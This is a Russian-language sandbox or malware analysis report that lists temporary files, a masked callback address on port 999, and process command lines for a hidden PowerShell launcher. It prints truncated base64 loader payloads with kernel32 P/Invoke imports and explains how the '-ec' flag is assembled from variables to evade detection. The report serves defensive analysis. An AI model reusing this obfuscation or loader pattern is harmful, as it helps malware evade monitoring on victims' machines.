Техническая информация
- %TEMP%\a7qpisu5.0.cs
- %TEMP%\a7qpisu5.cmdline
- %TEMP%\a7qpisu5.out
- %TEMP%\cscd02.tmp
- %TEMP%\resd03.tmp
- %TEMP%\a7qpisu5.dll
- %TEMP%\resd03.tmp
- %TEMP%\cscd02.tmp
- %TEMP%\a7qpisu5.0.cs
- %TEMP%\a7qpisu5.pdb
- %TEMP%\a7qpisu5.cmdline
- %TEMP%\a7qpisu5.out
- %TEMP%\a7qpisu5.dll
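- '16#.#20.167.138':999
  Примечание: символы «#» в адресе, по-видимому, заменяют часть цифр (маскирование в исходном отчёте), поэтому строку нельзя использовать как готовый сетевой индикатор; порт назначения — 999.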
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\a7qpisu5.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD03.tmp" "%TEMP%\CSCD02.tmp"' (со скрытым окном)
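- '%WINDIR%\syswow64\cmd.exe' /c powershell -w 1 -C "sv rmkxI - ; sv Ll ec; sv Ftte((gv rmkxI).value.toString() + (gv Ll).value.toString()); powershell(gv Ftte).value.toString() ('JAB0AGYAQwAgAD0AIAAnACQAZwBuAG4AUgAgAD0AIAA...
  Примечание: параметр «-ec» здесь не записан явно, а склеивается из переменных rmkxI («-») и Ll («ec») (sv и gv — псевдонимы Set-Variable и Get-Variable), поэтому поиск строки «-ec» или «-EncodedCommand» в этой командной строке ничего не найдёт. Для обнаружения надёжнее опираться на командную строку дочернего powershell.exe (следующие записи), где параметр виден явно, и на протоколирование блоков сценариев PowerShell. «-w 1» — сокращённая запись -WindowStyle со значением 1 (скрытое окно).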
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ec JAB0AGYAQwAgAD0AIAAnACQAZwBuAG4AUgAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0A...
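- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ec JABnAG4AbgBSACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsA...
  Примечание: видимое начало строк Base64 в этой и предыдущей записях декодируется (UTF-16LE) в «$gnnR = '[DllImport("kernel32.dll")]public static extern IntPtr Virtual…» и «$tfC = '$gnnR = ''[DllImport("kernel32.dll")]public static extern IntPt…» соответственно, то есть сценарий объявляет импорт функций kernel32.dll через P/Invoke. Запуски csc.exe и cvtres.exe и временные файлы a7qpisu5.* согласуются с компиляцией такого кода C# на лету (вероятно, через Add-Type). Остальная часть закодированной нагрузки в отчёте обрезана, поэтому её дальнейшее поведение по этому тексту установить нельзя.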
- '%WINDIR%\microsoft.net\framework\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\a7qpisu5.cmdline"
- '%WINDIR%\microsoft.net\framework\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESD03.tmp" "%TEMP%\CSCD02.tmp"